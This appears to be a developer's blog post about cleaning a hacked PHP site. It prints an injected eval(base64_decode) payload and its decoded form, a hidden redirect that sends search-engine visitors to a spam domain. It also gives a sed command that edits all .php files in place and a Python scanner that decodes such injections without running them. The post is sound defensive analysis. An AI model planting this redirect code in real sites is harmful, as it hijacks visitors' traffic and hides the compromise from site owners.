I recently had a client call me and tell me their site was linking to a spam site from a Google search. It turned out that searching for their company name on several major search engines took users to the spam site, while typing the URL in directly showed the site properly. After a bit of digging around I found some Base 64 encoding in a couple of the controlling PHP files.
Base64 is a group of similar encoding schemes that represent binary data in an ASCII string format by translating it into a radix-64 representation (Wikipedia). Needless to say, it is quite unreadable to the average human. Hackers love using it on compromised pages because it is not readily apparent what is happening. Many free WordPress templates also contain Base 64 encoded data in the footer with advertisements. Though Base 64 encoded data may be legitimate, PLEASE NEVER IGNORE BASE 64 ENCODING!! If you built the website you should know whether it should be there, but if you are working on a site someone else developed, always check the Base 64 data to make sure it is not a hack of some sort.
Now, let me show you what happened to my client. The primary FTP account was compromised, allowing the hacker to modify files. Probably with a script, the hacker changed all files with a .php extension in a clever way. <?php denotes the beginning of a PHP section, and the Base 64 code simply replaced that code with its own. This is what I found:
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOyAkbm
Njdj1oZWFkZXJzX3NlbnQoKTsgaWYgKCEkbmNjdil7ICRyZWZlcmVyPSRfU0VSVk
VSWydIVFRQX1JFRkVSRVInXTsgJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTl
QnXTsgaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmV
mZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpKSB7IGlmICg
hc3RyaXN0cigkcmVmZXJlciwic2l0ZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJjY
WNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsgaGVhZGVyKCJM
b2NhdGlvbjogaHR0cDovL2ZnaGhnaGZzNmZnLm9zYS5wbC8iKTsgZXhpdCgpOyB9IH0gfSI='));
That line instructs PHP to decode the Base 64 string and run whatever PHP code it contains. I copied the Base 64 data and decoded it myself, and this is what I found:
error_reporting(0); $nccv=headers_sent(); if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing")) {
if (!stristr($referer,"site") or !stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://fghhghfs6fg.osa.pl/"); exit(); } } }
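What this code is doing is checking where the user came from, and if it was from yahoo, google, or bing the user would be forwarded to the fghhghfs6fg.osa.pl site, which is nothing but spam. A visitor who types the URL in directly sends no search-engine referer, which is why the site looked normal that way. The inner check for site, cache, or inurl in the referer is joined with or, so it passes unless the referer contains all three words. The code also turns off error reporting and only redirects if no headers have been sent yet, so nothing visible goes wrong on the page.
So the moral of the story is that you need to ensure you and all your clients have secure passwords and maintain a vigil for inappropriate data in the system, especially if that data is Base 64, because it could be executing anything. My client was lucky this time that the code was fairly harmless, but it could have done anything from redirecting the site to stealing user information to destroying the database.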
Edit (02-24-2011):
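If you have shell access to your host, you can run the following command to temporarily disable the eval code. It edits every .php file under the current directory in place and removes the first occurrence of eval on each line, so take a backup first:
find ./ -iname "*.php" -type f -exec sed -i 's/eval//' {} \;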
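The check recommended above (find the Base 64 and read what it decodes to), as an added example that is not part of the original post: a Python scanner that locates eval(base64_decode('...')) calls in .php files and decodes them for reading without executing anything. The names decode_injections, scan_tree and HINTS, and the sample payload pointing at spam.example, are assumptions constructed for illustration.

```python
import base64
import os
import re
import textwrap

# eval(base64_decode('...')) with either quote style; the blob may be wrapped
# across lines, as it was in the injected files shown above.
INJECTION = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)
# Strings seen in the decoded payload on this page; treat as hints, not proof.
HINTS = ("HTTP_REFERER", "Location:", "error_reporting(0)")

def decode_injections(source):
    """Return (decoded_text, matched_hints) per call found; nothing is executed."""
    found = []
    for match in INJECTION.finditer(source):
        blob = re.sub(r"\s+", "", match.group(2))
        blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
        try:
            text = base64.b64decode(blob).decode("utf-8", "replace")
        except ValueError:
            continue  # not valid Base64 after all
        found.append((text, [h for h in HINTS if h in text]))
    return found

def scan_tree(root):
    """Map each .php file under root that contains an injection to its findings."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    hits = decode_injections(handle.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample: a harmless stand-in payload, wrapped like the one above.
_payload = 'error_reporting(0); header("Location: http://spam.example/"); exit();'
_blob = "\n".join(textwrap.wrap(base64.b64encode(_payload.encode()).decode(), 40))
SAMPLE = "eval(base64_decode('" + _blob + "'));\necho 'page body';\n"

if __name__ == "__main__":
    for text, hints in decode_injections(SAMPLE):
        print(hints, text)
```

Running scan_tree(".") from the site root lists every affected file with its decoded payload, so you can see what was injected before deciding how to clean it up.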